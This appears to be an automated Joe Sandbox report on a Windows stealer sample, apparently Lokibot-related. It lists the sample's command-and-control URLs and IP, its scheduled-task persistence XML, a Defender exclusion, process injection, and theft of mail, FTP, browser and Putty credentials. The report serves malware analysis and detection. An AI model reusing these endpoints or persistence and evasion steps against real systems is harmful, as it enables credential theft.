                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                      Software Packing                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1431964 Sample: gunzipped.exe Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 43 Snort IDS alert for network traffic 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 12 other signatures 2->49 7 gunzipped.exe 7 2->7         started        11 mPvIOxEZXJsdYp.exe 5 2->11         started        process3 file4 37 C:\Users\user\AppData\...\mPvIOxEZXJsdYp.exe, PE32 7->37 dropped 39 C:\Users\user\AppData\Local\...\tmp510D.tmp, XML 7->39 dropped 51 Uses schtasks.exe or at.exe to add and modify task schedules 7->51 53 Adds a directory exclusion to Windows Defender 7->53 55 Injects a PE file into a foreign processes 7->55 13 gunzipped.exe 75 7->13         started        17 powershell.exe 23 7->17         started        19 schtasks.exe 1 7->19         started        21 gunzipped.exe 7->21         started        57 Multi AV Scanner detection for dropped file 11->57 59 Tries to steal Mail credentials (via file registry) 11->59 61 Machine Learning detection for dropped file 11->61 23 schtasks.exe 1 11->23         started        25 mPvIOxEZXJsdYp.exe 11->25         started        27 mPvIOxEZXJsdYp.exe 11->27         started        signatures5 process6 dnsIp7 41 45.77.223.48, 49737, 49738, 49741 AS-CHOOPAUS United States 13->41 63 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->63 65 Tries to steal Mail credentials (via file / registry access) 13->65 67 Tries to harvest and steal ftp login credentials 13->67 69 Tries to harvest and steal browser information (history, passwords, etc) 13->69 71 Loading BitLocker PowerShell Module 17->71 29 WmiPrvSE.exe 17->29         started        31 conhost.exe 17->31         started        33 conhost.exe 19->33         started        35 conhost.exe 23->35         started        signatures8 process9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      gunzipped.exe32%VirustotalBrowse
                      gunzipped.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe18%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe32%VirustotalBrowse

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://kbfvzoboss.bid/alien/fre.php100%URL Reputationmalware
                      http://alphastand.top/alien/fre.php100%URL Reputationmalware
                      http://www.ibsensoftware.com/0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://alphastand.win/alien/fre.php100%URL Reputationmalware
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://alphastand.trade/alien/fre.php100%URL Reputationmalware
                      https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
                      http://45.77.223.48/~blog/?ajax=a0%Avira URL Cloudsafe
                      http://crt.cRa0%Avira URL Cloudsafe
                      http://45.77.223.48/~blog/index.php?rest_route=/0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/bThe0%VirustotalBrowse
                      http://45.77.223.48/~blog/index.php?rest_route=/0%VirustotalBrowse
                      http://45.77.223.48/~blog/?ajax=aNaN%VirustotalBrowse
                      http://www.founder.com.cn/cn/cThe0%VirustotalBrowse
                      http://www.founder.com.cn/cn0%Avira URL Cloudsafe
                      http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
                      http://www.zhongyicts.com.cn1%VirustotalBrowse
                      http://www.founder.com.cn/cn0%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://kbfvzoboss.bid/alien/fre.phptrue
                      • URL Reputation: malware
                      		unknown
                      http://alphastand.top/alien/fre.phptrue
                      • URL Reputation: malware
                      		unknown
                      http://45.77.223.48/~blog/?ajax=atrue
                      • NaN%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://alphastand.win/alien/fre.phptrue
                      • URL Reputation: malware
                      		unknown
                      http://alphastand.trade/alien/fre.phptrue
                      • URL Reputation: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.0gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.comgunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersGgunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://45.77.223.48/~blog/index.php?rest_route=/gunzipped.exe, 00000007.00000002.1967011464.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.founder.com.cn/cn/bThegunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designers?gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.ibsensoftware.com/mPvIOxEZXJsdYp.exe, mPvIOxEZXJsdYp.exe, 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://crt.cRagunzipped.exe, 00000000.00000002.1739814239.000000000798C000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://api.w.org/gunzipped.exe, 00000007.00000002.1967011464.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.tiro.comgunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designersgunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.goodfont.co.krgunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.chiark.greenend.org.uk/~sgtatham/putty/0gunzipped.exe, mPvIOxEZXJsdYp.exe.0.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.comlgunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sajatypeworks.comgunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.typography.netDgunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNgunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/cThegunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmgunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cngunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/frere-user.htmlgunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.jiyu-kobo.co.jp/gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/DPleasegunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fonts.comgunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krgunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleasegunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cngunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 1%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namegunzipped.exe, 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, mPvIOxEZXJsdYp.exe, 00000008.00000002.1763912656.0000000002F66000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.sakkal.comgunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              45.77.223.48
                                              		unknownUnited States
                                              		20473AS-CHOOPAUStrue

                                              General Information

                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1431964
                                              Start date and time:2024-04-26 04:56:10 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 7m 27s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:18
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:gunzipped.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@20/13@0/1
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 161
                                              • Number of non-executed functions: 30
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              03:57:06Task SchedulerRun new task: mPvIOxEZXJsdYp path: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe
                                              04:57:04API Interceptor13x Sleep call for process: gunzipped.exe modified
                                              04:57:05API Interceptor14x Sleep call for process: powershell.exe modified
                                              04:57:07API Interceptor1x Sleep call for process: mPvIOxEZXJsdYp.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              45.77.223.48SCB#89940578.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                              • 45.77.223.48/~blog/?ajax=posts.php
                                              Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                              • 45.77.223.48/~blog/?ajax=ee
                                              SCB99440721399.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                              • 45.77.223.48/~blog/?ajax=posts.php

                                              Domains

                                              No context

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              AS-CHOOPAUSSCB#89940578.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                              • 45.77.223.48
                                              Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                              • 45.77.223.48
                                              SCB99440721399.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                              • 45.77.223.48
                                              pikabot_core.bin.exeGet hashmaliciousPikaBotBrowse
                                              • 45.32.188.56
                                              https://i.imgur.com/EoTj4iI.pngGet hashmaliciousUnknownBrowse
                                              • 155.138.160.21
                                              https://i.imgur.com/VlAllek.pngGet hashmaliciousUnknownBrowse
                                              • 155.138.160.21
                                              shipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • 80.240.20.220
                                              Remittance. #U0440df.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 45.76.249.237
                                              NMdpQecbkg.elfGet hashmaliciousMiraiBrowse
                                              • 44.40.187.94
                                              shipping document.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 80.240.20.220

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gunzipped.exe.log

                                              Download File
                                              Process:C:\Users\user\Desktop\gunzipped.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mPvIOxEZXJsdYp.exe.log

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2232
                                              Entropy (8bit):5.379677338874509
                                              Encrypted:false
                                              SSDEEP:48:tWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZuUyus:tLHxvIIwLgZ2KRHWLOugIs
                                              MD5:D9B3B1E79DF444E11801E4C8824D3DC1
                                              SHA1:F96D6D68C57452C8CF4CA61BC78C3626A58F78E7
                                              SHA-256:E27D2875176040071D8358525C821BA3CD92E42BA6146A43E8A6E2075C025DFD
                                              SHA-512:9DF885DBB14EEC29A5C3EB0FF2272988AA22D291D52C123F73C834B30CFEE1F66DE79E1C5D5D6097CE3083628700FAEB703110E58071FDEFCC904ECF8300B93E
                                              Malicious:false
                                              Reputation:low
                                              Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3p4ptyv4.tie.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52n2fz0e.fyp.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0lbeger.xib.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_weyuahag.4my.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\tmp510D.tmp

                                              Download File
                                              Process:C:\Users\user\Desktop\gunzipped.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1580
                                              Entropy (8bit):5.12294802265756
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtad7xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTCv
                                              MD5:E78528F29C281C0F288ABE992CCA06D1
                                              SHA1:1478063B53A4A79C7440ACD309E45AEEF3654C25
                                              SHA-256:CE0471D4E81227FC3EBAEBC5E3DAB5F9ED98DECC4B6D389D0B472A84637D644A
                                              SHA-512:D684050C32BF833EFF9A2177709F79303A7437267D1EA2102151CF160AB79117C7280A00BA5EC95EDDB3D8E676DF03D9AF76EF1D506A67117B6E3DD0EF36FDF9
                                              Malicious:true
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                              C:\Users\user\AppData\Local\Temp\tmp5B1F.tmp

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1580
                                              Entropy (8bit):5.12294802265756
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtad7xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTCv
                                              MD5:E78528F29C281C0F288ABE992CCA06D1
                                              SHA1:1478063B53A4A79C7440ACD309E45AEEF3654C25
                                              SHA-256:CE0471D4E81227FC3EBAEBC5E3DAB5F9ED98DECC4B6D389D0B472A84637D644A
                                              SHA-512:D684050C32BF833EFF9A2177709F79303A7437267D1EA2102151CF160AB79117C7280A00BA5EC95EDDB3D8E676DF03D9AF76EF1D506A67117B6E3DD0EF36FDF9
                                              Malicious:false
